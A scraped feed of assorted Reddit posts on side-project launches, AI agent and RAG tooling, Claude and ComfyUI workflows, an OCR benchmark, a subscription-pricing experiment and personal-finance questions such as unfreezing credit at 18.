https://www.expenseeasy.app/scan

There’s a quick demo here if you want to see how chatting with the personal assistant works
https://www.youtube.com/shorts/UlpK7T4kXd4

I’m trying to build this around real usage, not theory. So if something feels pointless or missing, I’d rather hear that than compliments

r/mildlyinteresting your_local_squirrels

Water carton

r/AI_Agents Prajwalraj2

Best framework for building Agentic AI Solution

I am planning to build an advanced AI Product.

If you guys have built or currently building AI solutions, please let me know which one works best ( mostly for complex tasks)

- LangGraph
- CrewAI
- AutoGen
- Agno

Or if any other framework or solutions..!!

r/SideProject CutOk3283

Freepik Promo Code 2026 – Does the 90% Discount Still Work? (Real test)

Hey, I was actually looking for a working promo code for Freepik before upgrading to Premium, but honestly most of the coupon sites I found were either outdated or just didn’t work.

So I decided to test everything myself instead of relying on random “90% OFF” pages.

Here’s what I found:

Most Freepik promo codes are expired or invalid

Some show discounts but disappear at checkout

A lot of coupon websites are just recycled listings

But then I noticed something interesting… it’s not really about promo codes anymore. When I tested different ways of accessing the platform, I didn’t enter any coupon manually.

The discount was already applied when I reached the checkout page.

So it looks like Freepik might be using a link-based or referral activation system instead of traditional codes.

My result:

No coupon entered

Discount applied automatically

Final price visible before payment

Not sure if this works for everyone, but it definitely worked during my test.

Question

Has anyone else experienced this?

Are promo codes still working for you, or is it all based on how you access the site now?

(Optional – only if someone asks) I can share the exact method I used if anyone wants to test it.

r/Rag softwaredoug

Is grep all you need for RAG?

Hey all, I'm curious what you all think about Mintlify's post on grep for RAG?

The emphasis seems to be moving away from vectors + chunks toward harness design. The retrieval tool matters, but only up to a point. What's missing from most teams, in my experience, is harness design: putting in the constraints an agent needs to produce relevant results.

Instead they go nuts and spend $$ on 10B vectors in a vector DB. Probably they have some dumb retrieval / search solution they could start with and make decent progress.

That's what I blogged about here. Feedback welcome.

r/me_irl Beginning_Book_2382

me_irl

r/SideProject Less-Bite

Day 10 of sharing stats about my SaaS until I get 1000 users: Founders are apparently grinding on Saturday nights and Sunday afternoons

I was looking at the engagement heatmap for purplefree and it's kind of depressing. I expected Tuesday or Wednesday mornings to be the peak for lead generation. Instead, the biggest spikes are Sunday at 2pm UTC and Saturday night around 8pm to 10pm.

It looks like people are using their weekends to hunt for customers because they're probably working day jobs or stuck in meetings during the week. On Saturday at 8pm, I had 246 active engagements. Compare that to Monday at the same time which only had 72. It's a 3x difference.

Even Sunday afternoon is busy with 258 engagements at 2pm. I'm seeing this across the board. People aren't just signing up, they're actually digging through matches when they should probably be touching grass. It makes me realize that for a lot of us, lead gen isn't a during work task, it's a when I finally have a second to breathe task.


Key stats:

  • 258 engagements on Sunday at 14:00 UTC compared to just 67 on Monday at the same time
  • Saturday night peaks between 20:00 and 22:00 UTC with over 240 engagements per hour
  • Engagement drops by nearly 70 percent during the standard Monday morning work block
  • 156 total users are mostly active during hours when traditional sales teams are offline


156 / 1000 users. Still a long way to go.

Previous post: Day 9 — Day 9 of sharing stats about my SaaS until I get 1000 users: My users are lead-generation voyeurs

r/StableDiffusion infearia

FLUX.2 [dev] (FULL - not Klein) works really well in ComfyUI now!

ComfyUI has recently added low-VRAM optimizations for larger models. So, I decided to give FLUX.2 [dev] another try (before, I could not even run it on my system without crashing).

My specs: RTX 4060Ti 16GB + 64GB DDR4 RAM.

And I'm glad I did! Dev is still much slower than Klein for me (75s vs. 15s) - so Klein will probably remain my main daily driver for that reason alone - but Dev achieves the BEST character consistency across all OSS models I've tried so far, by a large margin! So, if you need to maintain character consistency between edits, and prefer not to use paid models, I highly recommend adding it to your toolbox. It's actually usable now!

Important details:

I'm using my own workflow with a custom 8-step turbo merge by silveroxides (thank you, beautiful human!), since adding the LoRA separately causes a massive slowdown on my system. Feel free to check it out below (it supports multiple reference images, masking and automatic color matching to fix issues with the VAE):

https://github.com/mholtgraewe/comfyui-workflows/blob/main/flux_2-dev-turbo-edit-v0_1.json

(Download links to all required files and usage instructions are embedded in the workflow)

r/ClaudeCode Rutvikk

Claude per day use sharing

I have started a Claude sharing arrangement where for 1 day you can use my 20x plan as you'd like (I'll be using it as well, but at most 5x-10x; the rest is yours to use as you'd like)

r/AI_Agents SignificantClub4279

What if your OpenClaw agent could do more than update you on the weather — proactively, while you sleep?

There's no question OpenClaw has been a revolutionary product — transforming the agentic world at a scale and scope many thought impossible. Even for those watching from the sidelines, the enthusiasm with which it was greeted was infectious. But then the reviews came in. The videos. The threads on this sub. And the early excitement quietly settled — not because the product failed to deliver, but because the expectations of many people, myself included, didn't quite match what it was built for. Ordinary people and indie hackers found it exciting but not immediately useful for them.

"OpenClaw, what's the weather?" and "OpenClaw, answer my grandma's email" weren't exactly the pressing problems we needed solved. We already have weather apps. And honestly? Answering the handful of messages we get from friends and family every day is one of the small joys of life — I'd never hand that off to an AI agent, and I suspect most of you wouldn't either.

For established businesses drowning in hundreds of daily emails, or influencers managing massive audiences, OpenClaw was everything they wished for. But most of us aren't there yet. And that's exactly where the enthusiasm and the reality collided. I watched this disconnect play out on this sub day after day. Members voicing the same frustration. The same vibe echoing across social media. It wasn't just noise — it was a real, shared problem. It affected me personally too.

So I asked myself: what if I built a plugin that turns OpenClaw from an email nanny into a 24/7 lead bounty hunter? One with a swarm of AI judges watching over it — making sure it operates within the bounds of social media rules and my own standards. No spam. No embarrassing cold messages. Just high-intent signals, reviewed by me before anything goes out.

So I built SignalPipe — the first agentic sales pipeline for OpenClaw. It monitors Reddit, Hacker News, and RSS feeds around the clock for people actively looking for what you sell. Every signal goes through a 4-stage filter before it ever reaches you, including a sarcasm detection step (yes, really — it matters more than you'd think). The ones that pass get a drafted reply ready for your approval. You approve, it sends. Nothing goes out without your say.

Once you've set it up, just ask your agent: "Find me buyers" — and take a nap. When you wake up: "Show me the leads" — approve the ones you like, skip the rest, and let SignalPipe handle the follow-up.

Thanks in advance, everyone. Happy to answer any questions — shoot them below.

r/whatisit JLV00

Weird Rock Formation in Woods of New Haven County, CT

I went on a hike about a month and a half ago and I forgot to post these pictures. It's of a bunch of rocks in a two concentric circles with a small gap in front, with a little piece of glass/metal that looks like a candle holder on top. The second picture is a large hole that was found maybe 20 feet from the formation that could've been where the rocks came from. What do we think this is? My dad was thinking maybe a crystal farm of some sort, as some of the rocks were split open and had yellowish crystals inside, but why go through the trouble to arrange the rocks in such manner? My initial thoughts were some sort of burial shrine, maybe for a pet (especially because of the little candle holder thing), but that's a lot of trouble to go through, especially because I can't imagine it's very easy to get an excavator in here. There's a park with some baseball fields and stuff about a half a mile through the woods, and also some power line towers in the area, so maybe it's possible, but this site had to be about a quarter of a mile from the nearest one, and also down a steep hill. Let me know what you all think!

r/personalfinance Ok_Development7589

Having difficulty with credit bureaus...

When I was born my parents put a credit freeze on all of my credit files due to potential breaches. Now, I just recently turned 18 and I'm trying to unfreeze my credit to get a new phone in my name... but I can't. We've tried to contact all of the credit bureaus but none of them have given us a clear answer on how to actually go about doing this. I believe TransUnion was the only bureau I had actually been able to create an account with and freeze my credit. Equifax hasn't responded to anything that we've sent through the mail, and every time we call we are told different ways to go about doing this. I've received the same letter from Experian stating that my credit file already has a freeze, but I don't know where that is or how to access it. I also have not been able to get a real person on the phone with Experian, just automated messages. If anyone else has experienced this problem and figured out the way to solve this, please help me!

r/ClaudeCode MustafaEminn__

No wonder I keep hitting usage limits

Sonnet 4.6 High thinking. VS Code extension

r/aivideo ovninoir

Zanita Kraklëin - Tombola

r/metaldetecting Welsh_Pirate_

A video showing my best Roman finds from wales :)

Some of my best Roman finds from wales 🏴󠁧󠁢󠁷󠁬󠁳󠁿 Re-uploaded without the end bit

r/personalfinance ScienceHDMI123

Seeking feedback on financial planning for higher incomes, but have a chronic saver mentality.

My wife and I both grew up middle class, very typical for NE USA. We are now married, recently bought a home, and are planning to have kids in the near future. Our budget seems pretty solid - beyond thankful most of budgeting is for WANTS and SAVING and not NEEDS.

I am a chronic saver, though. I have a hard time spending money on WANTS and default to SAVING with the thought of long-term investing, compounding, etc., deferring current enjoyment for future safety and benefit.

Financial overview:

  • My income: ~250k
  • Wife income: ~170k

  • 401k: Annual Maxed

  • My HSA: Annual Maxed

  • Roth IRA: Not started yet

  • Monthly Net Income after tax/benefit/401k : ~$17000

Major Monthly Expenses:

  • Mortgage PITI: $6,300 (28 years remaining, 730k, 6%)
  • Student Loans: $1000 or so (some coming out of forbearance)
  • Cars: $500 @1.9% - 1 more year left (Car worth 32k)
  • Food: $1000-$1500

There are obviously some other expenses that fluctuate a bit, but we have about $7,000 left after all monthly expenses.
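As a sanity check, that surplus follows from the figures above — the "other" bucket here is an assumed placeholder for the fluctuating expenses, not a number from the post:

```python
# Sanity check of the monthly surplus from the figures above; the
# "other" bucket is an assumed placeholder for fluctuating expenses.
net_income = 17_000  # monthly net after tax/benefits/401k

expenses = {
    "mortgage_piti": 6_300,
    "student_loans": 1_000,
    "cars": 500,
    "food": 1_250,   # midpoint of the $1,000-$1,500 range
    "other": 1_000,  # assumed fluctuating expenses
}

surplus = net_income - sum(expenses.values())
# lands right around the ~$7,000 figure in the post
```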

What I am struggling with is mainly -- How to allocate this extra money?

I understand it's a very good "problem" to have, but I am struggling to actually spend money for pleasure or want, especially growing up not in this type of situation. Obviously Roth IRA can be funded backdoor, and I am planning for that. Also planning on about two kids, so keeping that in mind as well.

  • 401k: About ~300k between us both
  • HSA: About 24k, invested in SP500
  • Cash: About 70k, 50k in FDLXX

Any advice? Good? Bad? Thing I'm not thinking of? Overthinking?

I really am mostly looking to optimize my financial planning to a degree where I don't need to be second guessing spending on things we want to do, places we want to go, home upgrades, etc.

r/LocalLLaMA Interesting_Let_2226

Getting experience with Ollama and cloud based models

I have been trying to get experience with Ollama (llama3.2 and mistral) for some time. At some point I got the idea of wrapping the models in a REST API with a React GUI, and deploying it on a cloud provider. I likely read that someone else had done that :-)
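The core of that wrapper idea is only a few lines — a sketch assuming a local Ollama server on the default port, using Ollama's /api/generate endpoint (model names as in the post):

```python
# Minimal sketch of wrapping local Ollama models behind a helper you can
# expose via any REST framework. Assumes an Ollama server on the default
# localhost:11434; model names are the ones mentioned in the post.
import json
import urllib.request

OLLAMA_URL = "http://localhost:11434/api/generate"

def build_payload(model: str, prompt: str) -> dict:
    """Request body for Ollama's /api/generate endpoint (non-streaming)."""
    return {"model": model, "prompt": prompt, "stream": False}

def generate(model: str, prompt: str) -> str:
    """POST the prompt to the local Ollama server and return its text."""
    data = json.dumps(build_payload(model, prompt)).encode()
    req = urllib.request.Request(
        OLLAMA_URL, data=data, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["response"]

if __name__ == "__main__":
    # Compare the same prompt across two local models.
    for m in ("llama3.2", "mistral"):
        print(m, "->", generate(m, "What is a REST API, in one sentence?"))
```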

Since I mostly have backend developer experience, I installed ChatGPT Codex in VS Code. Codex probably wrote 90% of both the frontend and backend code, and did 90% of the DevOps work.

I now have a web GUI where I can compare prompts and responses across several local models.

I’m curious — how are you all benchmarking / comparing models locally?

r/whatisit ClerkRepulsive5162

What is this object called, and what is it used for? I care to know.

r/mildlyinteresting WorstNatalie2

Demogorgon Lemon!

r/ClaudeAI Present_Scientist995

Best bank account for agents?

Been trying to find a way to let my Claude agent handle basic banking stuff like paying invoices and managing expenses without me having to log into a dashboard every time. Is anyone doing this yet or is it still too early? Every bank I look at seems like it was built for humans clicking buttons not agents making API calls

r/me_irl PeakPointFitness

me irl

r/whatisit deezmfnuts67

Weights?

I found these random iron plates on my rims. I recently got my tires changed, but the guy was really nice and I'm scared of all the kidnappings and whatnot in my area. Does anyone know what this is and why it's on my rim? It's only on one rim…

r/whatisit New_Analyst_6764

Squishy toy from Easter

All the other squishies I was putting in eggs were like chicks or bunnies, but I and everyone else I asked had no idea what it's meant to be

Btw it’s like a flat image

r/aivideo Eastern-Ad9515

The Ascent — Prologue to BREACH, a 13-Episode Sci-Fi Anthology

r/Jokes txorfeus

Sin vs. Shame

It's a sin to put it in, it's a shame to take it out.

r/ProgrammerHumor krexelapp

myKeyboardTeachingMeTenses

r/painting aliburak25

Acrylic figure study

r/meme Fickle-Butterfly-338

One of them is me...

r/ClaudeAI soulep

Macropad shortcuts for Claude

Is anyone using macro pads for their Claude workflow? I primarily use Cowork and Chat rather than Code but I’m curious if others are using macropads with Claude and what you’re mapping to them.

r/SideProject Maleficent-Lab-8599

I built a dead simple offline receipt maker because I was tired of ugly Canva templates

Hey r/SideProject

Every time I needed to give a client or customer a receipt, I was stuck using messy Canva templates or overly complicated tools.

So I built FlashInvo — a super clean, fast receipt maker.

Just upload your logo, add items, and it instantly generates a professional-looking PDF.

No account, no subscription, no branding, and it works completely offline.

It’s simple on purpose.

Would love your honest feedback:

Does the design look professional enough?

Would you actually use this for your business?

Try it here: https://flashinvo.com

Thanks!

r/PhotoshopRequest Accomplished_Pair377

Help with wedding pic edits

🤗 hello I'd appreciate it if I could get some help with my wedding pictures! I was so nervous I couldn't get my hair done the way I wanted I didn't get makeup done and it was cold and windy 😔 I have a big insecurity with my double chin and my hair. I've never liked myself in pictures and I was so nervous for this day I couldn't hardly move to put makeup on and I didn't have a team to help 😔 I'm looking for my chin to be sculpted and lean and my hair to look nice and full and if anyone can put small amount of eye makeup or make my eyes a bit more open. maybe define my waist some and slim me down just a tad. not asking to look totally different but just want to feel beautiful. I really appreciate anyone's help!

r/StableDiffusion jumpingbandit

Can WAN/LTX make such videos locally?

The resolution looks high and the prompt complex. Is it feasible?

r/ClaudeAI shuffles03

Using Claude to write articles in 2026, is my manual process outdated or is it actually fine?

I’ve been building a niche content site for a while now and I want to get an honest read from people here on whether I’m operating like it’s 2019 or whether my approach actually makes sense.

Here’s how I work.

I have a set of reference documents built up over months of iteration. A full article writing prompt, a tone and style guide with banned words and voice rules, an SEO and keyword guide, a branded HTML component design system, brand guidelines, and a master project instructions document that ties everything together.

Different session types use different combinations of these. Article sessions use one set. Component build sessions use another. Each chat has one purpose.

For articles, I paste my documents into a fresh session and give Claude the topic. It comes back with a keyword proposal, gap analysis, and angle before writing anything. I confirm or adjust.

Then we spar.

Claude drafts sections and stops to ask me things. What was my actual experience of this? What’s a specific detail only I would know? I give raw notes and half-finished thoughts and it shapes them into my voice.

The final article has things in it that no competitor can replicate because the knowledge is genuinely mine.

I review everything. I push back when something reads wrong. We go again. This is the part I would never automate.

HTML components are separate sessions entirely. I have a full custom design system, cost tables, stat rows, affiliate CTA boxes, interactive tools. Each one gets its own chat with the relevant documents.

I know nothing about code, genuinely nothing, I don’t use that side of my brain at all. I can only tell if something is wrong visually so Claude has to get it right or we debug by eye.

The place I keep getting stuck is any time I try to build something more systematic. I’ve made several attempts at creating proper workflows and automation, because everything I read suggests that’s the direction things are moving and that pasting documents into chat prompts is essentially archaic at this point.

Terminal, GitHub, Make.com. Every attempt went sideways. I ask the wrong questions because I don’t know what I don’t know.

Sessions drift, something gets built incorrectly, I can’t tell if it’s right because I don’t understand what’s been built, and I eventually scrap it.

Claude has mentioned Cowork and Claude Code as things worth looking at down the line but both feel like more complexity than I can manage right now.

I tried Gemini Pro 3.1 because the usage limits are far more generous than Claude Pro. Fed it my full document set. It couldn’t hold the instructions across a session and drifted into generic positive AI prose, exactly what my tone guide bans.

When I pushed back it actually diagnosed its own failure and said it needs a chained multi-agent workflow to do what Claude does in one session. So that was that.

My philosophy is one good article, not fifty average ones. One brick at a time. The compounding effect of genuinely useful content that ranks and earns trust over time. I’m not trying to produce at volume. I’m trying to produce something actually good.

But reading this subreddit I feel like everyone is running agents, building pipelines, automating multi-model workflows. And I’m sitting here pasting Google Docs into a chat window like it’s 2023.

So the honest question is: in 2026, what do I actually gain from automating the content side? If the usage is roughly the same whether manual or through a pipeline, and the entire value of what I’m building comes from the sparring and the genuine human input, what’s the argument for changing anything?

Is the manual process embarrassingly outdated or is it the right call for content built around a specific voice and knowledge that can’t be generated?

r/SideProject AdilShaikh5786

How many of you are losing revenue due to failed Stripe payments?

I’ve been digging into subscription SaaS metrics and one thing keeps coming up:

Failed payments = silent revenue loss.

Things like:

  1. expired cards
  2. bank declines
  3. users forgetting to update payment

I read that this can cause 10–30% of subscription revenue to fail at some point, which sounds crazy.
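For context on the recovery side, retry scheduling itself is trivial to sketch. To be clear, this is not Stripe's Smart Retries logic (that system picks retry times adaptively with machine learning); the 3/5/7-day intervals here are purely illustrative:

```python
# Toy fixed-interval dunning schedule. Stripe's Smart Retries choose
# retry times adaptively, so the 3/5/7-day offsets are illustrative only.
from datetime import date, timedelta

RETRY_OFFSETS_DAYS = (3, 5, 7)  # assumed intervals, not Stripe defaults

def retry_schedule(failed_on: date) -> list[date]:
    """Dates on which to reattempt a failed charge and email the customer."""
    return [failed_on + timedelta(days=d) for d in RETRY_OFFSETS_DAYS]

if __name__ == "__main__":
    for attempt in retry_schedule(date(2026, 3, 1)):
        print("retry + dunning email on", attempt.isoformat())
```

The interesting question is less the schedule and more whether anyone acts on the failures at all.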

Curious from real founders:

Are you actually seeing this in your business? Roughly how much revenue do you think you lose monthly because of failed payments? Are Stripe Smart Retries and emails enough, or are you still leaving money on the table?

Not selling anything just trying to understand how real this problem is.

r/ChatGPT Orome2

I just lost the last portion of all of my long chats after letting my Plus subscription expire.

Just a warning to others thinking about getting rid of your Plus subscription. Back up all your important work BEFORE it expires!

OpenAI says you won't lose your chats even if you are no longer a paid subscriber. It's bullshit. I think what happened was some of my chats were too long for the free subscriber context window and everything after that got truncated.

There is a lot of context, work, and threads I've been working through for months that just got nuked.

What's even more annoying is chatgpt will gaslight you when you ask about the truncated threads telling you it never happened and say that it can't happen because OpenAI says you "won't lose your chats if you cancel Plus".

r/SideProject jodeedev

I'm 15 and spent the last 18 months building a cross-platform productivity app because the subscription trend felt like a scam.

Hi everyone, I'm a 15-year-old dev and after trying like 10 productivity apps, each of which had an expensive subscription for basic features or was missing a lot of features, I decided to build a completely free alternative from scratch using Kotlin Multiplatform.

It’s called Telic. It’s an all-in-one productivity ecosystem, running on Android, iOS, MacOS and Web.

It can be completely free because I sync your data through your own Google Drive, which keeps my server costs at $0. It also means your data never touches my servers, because I don't have any.

Features:

  • A Connected Ecosystem: Tasks, Habits, Calendar, Gantt charts, and Gamified stats all interconnected in one place.
  • On All Your Devices: Native on iOS, macOS, Android, and even Web.
  • Deep Customization: 10+ palettes, time-based palettes, and heavy UI tweaking to make it feel native to your setup.
  • Smart Features: An optional AI Assistant and QuickAdd functionality.

It's been a huge project and I'm actively pushing updates to fix bugs and improve the features. I’d genuinely appreciate any feedback from other devs! Let me know if anything breaks or you think of any missing features!

r/personalfinance Significant_Home218

Looking for Trusted Aged Care Services for Seniors – Any Recommendations?

I am searching for reliable aged care services that provide professional support, safety, and comfort for elderly family members. I would like to know about services such as daily care assistance, medical support, and personalized care plans. Has anyone had experience with providers like For Purpose Aged Care or similar aged care services? Please share your suggestions, costs, and overall experience.

r/Seattle AffectionateLuck6190

I'm aware this isn't a popular take...

but does anyone else despise the sunny months here like me? I truly feel depressed.

r/AI_Agents Budget-Juggernaut-68

Claude code harness to automate workflow

I'm looking for advice on how to write repeatable workflows for Claude Code to better analyze documents and then write reports on them.

We have internal databases containing various files and documents, and I'd like to enable users to perform research more effectively. I would like Claude Code to be the agent harness that conducts the research and acts as the first layer of filtering.

I've written scripts that enable it to conduct searches, and it is pretty decent at making queries and pulling data. It is also able to pull the right information and then write reports from it.

I'd like it to perform these tasks for the different research questions we have, identifying data points that may help us answer them. Some of these questions are evergreen and will need to be revisited repeatedly, so I'd like to schedule Claude Code to perform these tasks.

I'm aware that we can build pipelines ourselves to control how it does the tasks deterministically, but the flexibility will help a lot.

Edit: what kind of plugins would you install/write? Should I have a custom research agent, a database query agent, etc.?

r/metaldetecting NoGovernment2505

It's so lovely when it's sunny

Sold my Nokta Simplex Ultra and bought this bad boy :)

r/nononono Admirable_North_8969

The Room

r/painting NicksPaintings

"Dream Traveler" acrylic painting by Nick Flook

r/ChatGPT shhdwi

Nanonets OCR-3 vs GPT-5.4 and Gemini 3.1 Pro on document parsing: benchmark comparison across 7 categories

Nanonets just released OCR-3, a 35B (A3B active) MoE model built specifically for document understanding. Here's how it compares to the general-purpose models on actual OCR tasks.

olmOCR Benchmark (7 categories):

| Model | ArXiv Math | H&F | Long/Tiny | Multi-Col | Old Scans | Scans Math | Tables | Overall |
|---|---|---|---|---|---|---|---|---|
| Nanonets OCR-3 | 89.2 | 96.6 | 93.4 | 87.6 | 49.6 | 88.9 | 94.2 | 87.4 |
| GPT-5.4 | 83.1 | — | 82.6 | 83.7 | 43.9 | 82.3 | 91.1 | 81.0 |
| Gemini 3.1 Pro | 70.6 | — | 90.3 | 79.2 | 47.5 | 84.9 | 84.9 | 79.6 |

OmniDocBench: OCR-3 scores 90.5 vs GPT-5.4 at 85.3 and Gemini 3.1 Pro at 85.3.

The gap is widest on tables (94.2 vs 91.1) and multi-column layouts (87.6 vs 83.7). Old scans are hard for everyone — 49.6 is their worst category, though GPT-5.4 scores 43.9 there.

Interesting detail: an LLM-as-judge analysis on the olmOCR results found 437 of 864 "failures" were evaluator brittleness, not actual model errors. After correcting for that, weighted average goes to 93.1. Has anyone here run similar evaluator audits on OCR benchmarks?

The model is a specialized VLM, not a general-purpose LLM. It does document parsing, schema-based extraction, document splitting/classification, RAG-optimized chunking, and visual QA on documents. Each with bounding boxes and confidence scores.

GPT-5.4 + Nanonets OCR-3, with its confidence scores and bounding boxes, should give superior accuracy in RAG-based apps.

Currently working on a RAG indexing framework which I will open-source next week (got 94.5% on Finance bench and 96% on DocLegal bench using this)

r/ClaudeCode omarsmak

How do you get Claude Code to make better architectural decisions?

Hi folks,

I’m using Claude Code on a large monorepo and relying on it heavily for feature work and bug fixes. One thing I’ve noticed is that, when implementing a ticket, it often takes the easiest path rather than the right one architecturally. For example, it may introduce something hacky instead of creating the proper abstraction or interface.

Because I know the codebase well, I can usually catch those design smells during review. But I’m worried that someone less familiar with the system might miss them.

What have you found works best to steer Claude Code toward better architectural decisions instead of quick tactical fixes? I’ve already tried tightening the prompts and creating custom skills, but the results are still not where I want them to be.

Any tips would be much appreciated 👍

r/StableDiffusion yawehoo

Replacing Pee Wee Herman with John Wayne (Wan 2.2)

There are several ways to change one person into another. This is how I do it. This method gives good results but can be a little time-consuming, so it is perhaps better suited for bigger projects.

The video uses two methods, one for clips without dialogue, one for clips with dialogue.

First of all I use Pinokio/Wan2.2, so no comfy-workflow, sorry.

  1. So this is for clips without dialogue. I created a Lora of the Replacer (in this case John Wayne).
  2. I cloned John Wayne's voice using Fish Audio. But there are so many good voice models out there so I think most of them can handle that.
  3. As I mentioned I use Pinokio and the Wan 2.2 model. Included in the Wan 2.2 model there is the Wan 2.1 model and included in that is the FusioniX model! Phew!

What's good about FusioniX is that it can do masking and it is fairly quick to render.

4. Load in a clip in FusioniX. In 'control video process' choose 'transfer Human Motion and Depth'. In 'Area Processed' choose 'masked Area'. Open the Video Mask Creator (it's at the top of the page). Mask out the person you want to replace (in this case Pee Wee Herman).

Since Pee Wee and John Wayne have different body types, I expanded the mask quite a bit.

5. Put the Lora of John Wayne in your prompt and be sure to describe him in detail. Hit 'generate'.

And that's it! The result is usually bang on!

6. For clips with dialogue, there is a different method. I take a screenshot of the first frame of the clip, use the mask on that image to switch out the characters, then use it as a reference image in MultiTalk (also in Wan 2.1) together with John Wayne's audio.

So, yeah. Lots of work and one lingering question remains….why?!

r/BrandNewSentence bolshoybooze

40 years later, my family is suing each other to dig up her corpse and move it because 'there's no threesomes in heaven'.

r/me_irl Beginning_Book_2382

me_irl

r/homeassistant greenbeast999

'Sensor Light' blueprint, figuring out how to do something

This blueprint is working great in several rooms. However, I'd like to change the bedroom automation so that during 'night hours' (I have an automation to set those) it triggers on but not off.

If anyone is more familiar with this blueprint and knows how to achieve this, I'd be grateful for the help.

r/ClaudeAI Daniel_SES

I built an MCP server that gives Claude long-term SEO memory for your sites

Most SEO tools are built for SEO people. I wanted something that fits how I already work - inside Claude.

So I built SEOLint: an MCP server that connects to Claude Desktop or Claude Code in 2 minutes and gives Claude 7 SEO tools it can call from any conversation.

Here's a demo: https://www.youtube.com/watch?v=RNAr07ZLHFg

The workflow:

  1. get_site_intelligence(domain) - Claude learns what your site is trying to do, who it's for, and what structural patterns exist across all your pages
  2. get_open_issues(domain) - every unresolved issue, labelled NEW / PERSISTING / REGRESSED
  3. Claude fixes it in your codebase
  4. mark_issues_fixed(scanId, ids[]) - memory updated

The memory system is the part I'm most proud of. Every scan is compared to history. Fix something, it closes. Break it again on a future deploy, it shows up as REGRESSED. Claude knows what changed between sessions.

Every issue also includes the actual broken HTML element so Claude can fix it immediately without hunting for it.

Setup - add this to your Claude Desktop config:

{ "mcpServers": { "seolint": { "command": "npx", "args": ["-y", "seolint-mcp"] } } } 

Also ships as a CLI and REST API if you want it in GitHub Actions.

Happy to answer questions - built this in a week, still very early.

seolint.dev

r/personalfinance SignificanceDue4908

Probate lawyer didn't include mother's bank account, wants $350 to add it in

I hired a probate lawyer to handle my mother's estate, and he neglected to include her bank accounts; now he wants about $350 to add them in. She only had about $300, so it doesn't seem worthwhile. Are there any other avenues I can take? I'm in Florida, btw.

r/SideProject SteveDraughn

I increased my 10K MAU NFL trivia app’s revenue by ~33% by testing different subscription offers

Around 9 months ago I shipped an NFL trivia app (Gridiron Trivia) and began monetizing it with in-app subscriptions/purchases in July. The business model is pretty similar to New York Times games: offer daily games for free (with ads) and offer collections of games for one-time purchase. Subscribers get the ad-free version and access to all game collections.

The app got to 10K MAU by the end of the NFL season (no ad spend) and now natural growth has started to plateau since the season ended. I decided the best usage of time was to attempt to optimize the in-app purchase strategy to increase LTV, so I ran an experiment for the past 2 months and thought I’d share the results here as my changes ended up making a pretty big difference.

Prior to the experiment, our subscription pricing and basic statistics were as follows:

  • Subscription Pricing: $4.99/mo | $39.99/yr | $59.99 lifetime
  • Split: 80% | 15% | 5%
  • Conversion to Paid: 5.3%
  • Relative LTV: lifetime LTV > yearly LTV >>> monthly LTV.

The goal of the experiment was to test whether providing special pricing to user cohorts increases LTV over the status quo.

Experiment Design: New users were randomly assigned to 1 of 4 groups with equal distribution:

  • Group A: $24.99/yr special offer
  • Group B: $34.99 lifetime special offer
  • Group C: 7-day free trial then $4.99/mo
  • Group D: Control

I used Truflag to manage the experiment:

  • Created a flag that served either A, B, C, or D
  • Created a metric to track user purchases and subscriptions
  • Created an experiment with the flag and metric for 100% of new users with 25/25/25/25 distribution
  • Read the flag using the SDK and pop a modal (after 3 games played) with the special offer (or control)

Experiment Results:

| Group | Offer | Paid conversion | Purchase mix (monthly / yearly / lifetime) | Initial revenue impact | Expected LTV impact |
|---|---|---|---|---|---|
| A | $24.99/yr special offer | 6.4% | 58% / 34% / 8% | +50.4% | +33.0% |
| B | $34.99 lifetime special offer | 5.9% | 52% / 12% / 36% | +71.3% | +31.6% |
| C | 7-day free trial then $4.99/mo | 8.0% | 88% / 9% / 3% | -37.3% | +27.6% |
| D | Control | 5.3% | 80% / 15% / 5% | baseline | baseline |

All 3 groups outperformed the control by over 25% from the LTV perspective*, with a dip in initial user revenue with Group C. The primary metric we cared about was the expected LTV impact, and Group A’s +33.0% improvement over control was the highest.
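The structure of the expected-LTV comparison can be sketched as follows; the per-tier LTV values below are placeholder assumptions (the post doesn't publish them), so the computed lifts illustrate the calculation rather than reproduce the table's numbers:

```python
# Expected LTV per new user = P(convert) * mix-weighted per-tier LTV.
# TIER_LTV values are hypothetical placeholders, NOT from the post.
TIER_LTV = {"monthly": 12.0, "yearly": 40.0, "lifetime": 60.0}

GROUPS = {
    "A": (0.064, {"monthly": 0.58, "yearly": 0.34, "lifetime": 0.08}),
    "B": (0.059, {"monthly": 0.52, "yearly": 0.12, "lifetime": 0.36}),
    "C": (0.080, {"monthly": 0.88, "yearly": 0.09, "lifetime": 0.03}),
    "D": (0.053, {"monthly": 0.80, "yearly": 0.15, "lifetime": 0.05}),  # control
}

def expected_ltv_per_user(group: str) -> float:
    conversion, mix = GROUPS[group]
    return conversion * sum(share * TIER_LTV[tier] for tier, share in mix.items())

baseline = expected_ltv_per_user("D")
for name in "ABC":
    print(f"Group {name}: {expected_ltv_per_user(name) / baseline - 1:+.1%} vs control")
```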

At least in my case, changing the pricing/offer structure made a much bigger difference than I expected.

Curious what kind of results other people have seen from testing intro discounts, trials, or lifetime offers or if you guys have other ideas for what experiments to run.

*LTV calculations were based on observed user churn for monthly and expected user churn for yearly.

r/aivideo S1NTDNS

Black Art Basel (000000)

r/LocalLLM RebelionFiscal

Is there a model that's free from all that user-validation & engagement-maximizing crap? I'm tired of it.

I'm simply tired of all that crap. I want a model that simply responds to a straightforward prompt without trying to lick my balls every step of the way by telling me I'm intelligent, I had a brilliant idea, or whatever crap it thinks will help it maximize user retention and consumption.

I am also hoping to have a 7-8 billion parameter model that will run just fine on an M2 16gb on the side for basic stuff.

Is it too much to ask for?

I'd truly appreciate if somebody could point me in the right direction. I wasn't able to find anything about this online.
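For what it's worth, a blunt system prompt over Ollama's chat API often gets most of the way there with any ~7-8B instruct model. The model name and prompt wording below are illustrative assumptions:

```python
import json

# The system prompt wording is illustrative; tune to taste.
SYSTEM = (
    "Answer directly and concisely. No compliments, no praise of the question, "
    "no engagement-bait follow-up questions. If unsure, say so."
)

def build_chat_request(model: str, user_prompt: str) -> dict:
    """Payload for Ollama's /api/chat endpoint (POST http://localhost:11434/api/chat)."""
    return {
        "model": model,  # example name; any locally pulled instruct model works
        "messages": [
            {"role": "system", "content": SYSTEM},
            {"role": "user", "content": user_prompt},
        ],
        "stream": False,
    }

req = build_chat_request("qwen2.5:7b-instruct", "Explain TCP slow start.")
print(json.dumps(req, indent=2))
```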

r/SideProject sequencer3488

I turned my notes on Reddit launches into a tool and here's what it generates

